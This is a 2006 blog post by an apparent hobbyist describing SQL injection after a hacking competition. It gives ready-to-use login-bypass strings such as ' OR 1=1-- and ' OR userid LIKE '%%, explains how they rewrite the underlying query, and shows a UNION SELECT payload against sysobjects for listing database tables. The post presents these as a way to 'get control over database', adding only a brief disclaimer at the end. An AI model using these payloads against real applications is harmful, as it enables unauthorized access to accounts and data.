Saturday, March 04, 2006

SQL Attacks : Hacking

Yesterday I was participating an hacking competetion in which at one stage I had login on a page and after that can get to next level . When at first i randomly typed any password. then it gave an sql error that " zero row selected" and incorrect password. So I thought of using SQL string injection . SQL is poor in security issues surrounding is the login and url strings. So idea is you give these values in login form :
user : ' OR 1=1--
password : ' OR 1=1--

and voila you are in. the other possible strings for password are :

  • ' OR a=a--
  • ' or 0=0 #
  • ") or ("a"="a
  • ') or ('a'='a
So whats the funda behind this :
When you click "login" or "enter" on webpage the variables 'userid' and 'password' are to sql. The underlying query is :

SELECT * from auth_db where username = ' $userid ' AND password = '$password'

So if you have entered username = admin and password = test123 then query executed will be :
SELECT * from auth_db where username = ' admin ' AND password = 'test123 '

So in auth_db , if userid and password are correct than corresponding row will be selected and as no of rows returned is > 0 you will be granted access. But if password is incorrect than it will retun zero rows and permission won't be granted. But if you use SQL string injection like if you put ' OR 1=1-- as password and username both than query executed will be :

SELECT * from auth_db where username = ' ' OR 1=1-- ' AND password = '' OR 1=1-- '

Because a pair of hyphens designate the beginning of a comment in SQL, the query becomes simply becomes :

SELECT * from auth_db where username = '' OR 1=1

The expression 1=1 is always true for every row in the table, and a true expression or'd with another expression will always return true. So, assuming there's at least one row in the Users table, this SQL will always return a nonzero count of records.So you are logged in now. And if in some cases But many times sql tries to parse = character in input strings and didn't allow to do so, hence trick is using :
' OR userid LIKE '%%

So resultant query will be

SELECT * from auth_db where username = ' ' OR userid LIKE '%% ' AND password = '' OR userid LIKE '%% '
So every string matches '%%' so it returns non zero number of and you are granted access.
Not all SQL injection attacks involve forms authentication. All it takes is an application with some dynamically constructed SQL and untrusted user input. Most SQL-compliant databases, including SQL Server, store metadata in a series of system tables with the names sysobjects, syscolumns, sysindexes, and so on. This means that a hacker could use the system tables to ascertain schema information for a database to assist in the further compromise of the database. For example, the following text entered into the txtFilter textbox might be used to reveal the names of the user tables in the database:
' UNION SELECT id, name, '', 0 FROM sysobjects WHERE
xtype ='U' --
The UNION statement in particular is useful to a hacker because it allows him to splice the results of one query onto another. In this case, the hacker has spliced the names of the user tables in the database to the original query of the Products table. The only trick is to match the number and datatypes of the columns to the original query. The previous query might reveal that a table named Users exists in the database. So after this with multiple queries you can get control over database.

Updated :
Also visit Ten hacker tricks to exploit SQL Server systems
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility

1 comment:

Anonymous said...


This site has got some amazing free tutorials in various topics like Java, JSP, Servlets, EJB's, SQL, PLSQL etc